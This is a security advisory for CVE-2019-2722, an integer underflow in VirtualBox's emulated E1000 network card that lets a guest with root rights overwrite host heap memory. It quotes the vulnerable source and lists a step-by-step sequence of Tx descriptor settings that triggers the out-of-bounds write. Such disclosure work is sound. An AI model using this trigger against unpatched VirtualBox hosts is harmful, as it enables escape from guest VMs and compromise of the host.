CVE: CVE-2019-2722
Tested Versions:
- Oracle VirtualBox 5.2.28 and earlier
- Oracle VirtualBox 6.0.6 and earlier
Product URL(s): https://virtualbox.org
VirtualBox is a x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. It is a solution commercially supported by Oracle, in addition to being made available as open source software. It runs on various host platforms like Windows, Linux, Mac and Solaris and also supports a large number of guest operating systems.
Vulnerability Details
The default virtual network device exposed to guest VMs is an Intel PRO/1000 MT Desktop (82540EM), also known as the E1000. A vulnerability was discovered in the VirtualBox code that emulates the E1000 device, allowing the guest to write to the host’s memory, via an integer underflow bug. This allows an attacker with root/administrator privileges in a guest to escape to the host ring 3.
This vulnerability was disclosed via the Pwn2Own programme by ZDI.
Background
To send network packets a guest does what a common PC does: it configures a network card and supplies network packets to it. Network packets supplied to the adaptor are wrapped in Tx (transmit) descriptors. The Tx descriptor is a data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0). It stores metadata such as the packet size, VLAN tag, TCP/IP segmentation enabled flags and so on.
To supply Tx descriptors to the network card, the guest writes them to Tx Ring. This is a ring buffer residing in physical memory at a predefined address. When all descriptors are written to Tx Ring, the guest updates E1000 MMIO TDT (Transmit Descriptor Tail) register to tell the host there are new descriptors to handle.
During processing, there are two ways for a data descriptor to be added to the frame:
e1kAddToFrame()
if the segmentation enable flag (fTSE) of this descriptor is offe1kFallbackAddToFrame()
if the fTSE of this descriptor is on
Vulnerability
The vulnerability occurs in the e1kFallbackAddToFrame()
function which can be reached by writing the Tx descriptors to the network card memory and telling the host to handle them:
static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread) {
....
uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;
....
do {
uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
if (cb > pDesc->data.cmd.u20DTALEN) {
cb = pDesc->data.cmd.u20DTALEN;
rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
} else {
rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, true /*fSend*/, fOnWorkerThread);
pThis->u16TxPktLen = pThis->contextTSE.dw3.u8HDRLEN;
}
....
} while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));
....
}
If we can control the value of two variables: u16MaxPktLen
and pThis->u16TxPktLen
then we can make the integer underflow occur in cb
when pThis->u16TxPktLen
is larger than u16MaxPktLen
.
The function e1kFallbackAddSegment()
will then perform a write to the host memory with our controlled offset:
static void e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread) {
...
PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);
...
pThis->u16TxPktLen += u16Len;
PDMDevHlpPhysRead()
function copies a buffer of u16len
bytes from the guest memory which we can control to the pThis->aTxPacketFallback
buffer in the host memory at index pThis->u16TxPktLen
. Since we can control u16len
value, we can overwrite whatever comes after the pThis->aTxPacketFallback
buffer.
Thus the integer underflow could lead to heap out-of-bounds write in the host.
Triggering the Out-of-bounds Write
The important variables to determine are, as mentioned above, u16MaxPktLen
and u16TxPktLen
.
The value of u16MaxPktLen
is calculated from the following expression in e1kFallbackAddToFrame
above:
u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS
pThis->contextTSE.dw3.u8HDRLEN
and pThis->contextTSE.dw3.u16MSS
are fields from the context descriptor that the guest writes to the device memory, and they need to pass the check:
DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc) {
...
uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
{
pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
...
So the maximum value of u16MaxPktLen
is E1K_MAX_TX_PKT_SIZE - 4 = 0x3F9C
During processing, pThis->u16TxPktLen
is initialized to 0 and subsequent data descriptors can modify its value.
The data descriptors are handled in e1kXmitDesc
, and depending on the TSE flag, calls either function that affects u16MaxPktLen
as follows:
e1kFallbackAddToFrame()
if thepDesc->data.cmd.fTSE
flag is oncb = u16MaxPktLen - pThis->u16TxPktLen
- increments
pThis->u16TxPktLen
bycb
e1kAddToFrame()
if thepDesc->data.cmd.fTSE
flag is off- Increase
pThis->u16TxPktLen
bypDesc->data.cmd.u20DTALEN
if the new size is less thanE1K_MAX_TX_PKT_SIZE
- Increase
Now that we understand the logic of how the TX descriptors are handled, we can trigger the out-of-bounds write by sending a series of descriptors:
TX_descriptors[0].context.dw2.u4DTYP = E1K_DTYP_CONTEXT;
TX_descriptors[0].context.dw2.fDEXT = 1;
TX_descriptors[0].context.dw2.fTSE = 1;
TX_descriptors[0].context.dw3.u8HDRLEN = 0;
TX_descriptors[0].context.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - 4 - 1;
TX_descriptors[0].context.dw2.u20PAYLEN = 0x10000;
The initial context descriptor sets the u16MaxPktLen
value to E1K_MAX_TX_PKT_SIZE - 4 - 1
by specifying the MSS.
TX_descriptors[1].data.cmd.u4DTYP = E1K_DTYP_DATA;
TX_descriptors[1].data.cmd.fDEXT = 1;
TX_descriptors[1].data.cmd.fTSE = 1;
TX_descriptors[1].data.cmd.u20DTALEN = E1K_MAX_TX_PKT_SIZE - 4 - 2;
By setting the TSE flag, this data descriptor gets processed by e1kFallbackAddToFrame()
,
causing the pThis->u16TxPktLen
value to be set to E1K_MAX_TX_PKT_SIZE - 4 - 2
.
TX_descriptors[2].data.cmd.u4DTYP = E1K_DTYP_DATA;
TX_descriptors[2].data.cmd.fDEXT = 1;
TX_descriptors[2].data.cmd.fTSE = 0;
TX_descriptors[2].data.cmd.u20DTALEN = 2;
The next data descriptor has the TSE flag unset, causing e1kAddToFrame()
to increase the pThis->u16TxPktLen
value by 2 to E1K_MAX_TX_PKT_SIZE - 4
, which now becomes larger than u16MaxPktLen
set by the first context descriptor.
TX_descriptors[3].data.cmd.u4DTYP = E1K_DTYP_DATA;
TX_descriptors[3].data.cmd.fDEXT = 1;
TX_descriptors[3].data.cmd.fTSE = 1;
TX_descriptors[3].data.cmd.u20DTALEN = overwrite_size;
TX_descriptors[3].data.u64BufAddr = overwrite_buf.QuadPart;
Finally, the last data descriptor forces the processing to go through e1kFallbackAddToFrame
,
where the integer underflow occurs and results in overwrite_size - 4
bytes after the host transmit buffer being overwritten with our controlled overwrite_buf
.
TX_descriptors[4].data.cmd.u4DTYP = E1K_DTYP_DATA;
TX_descriptors[4].data.cmd.fDEXT = 1;
TX_descriptors[4].data.cmd.fTSE = 1;
TX_descriptors[4].data.cmd.fEOP = 1;
TX_descriptors[4].data.cmd.u20DTALEN = 0;
This final descriptor just has the EOP
flag set to terminate processing.
Exploiting this out-of-bounds write allows an attacker to escape the guest VM.
Timeline
- 2019-03-20 Vulnerability reported to vendor via ZDI (Pwn2Own)
- 2019-04-29 Coordinated public release of advisory
Vendor Response
The vendor has acknowledged the issue and released an update to address it.